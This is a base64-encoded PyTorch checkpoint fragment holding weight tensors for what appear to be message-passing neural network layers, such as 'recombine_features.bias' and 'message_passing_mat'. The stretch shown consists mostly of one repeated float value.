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PLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+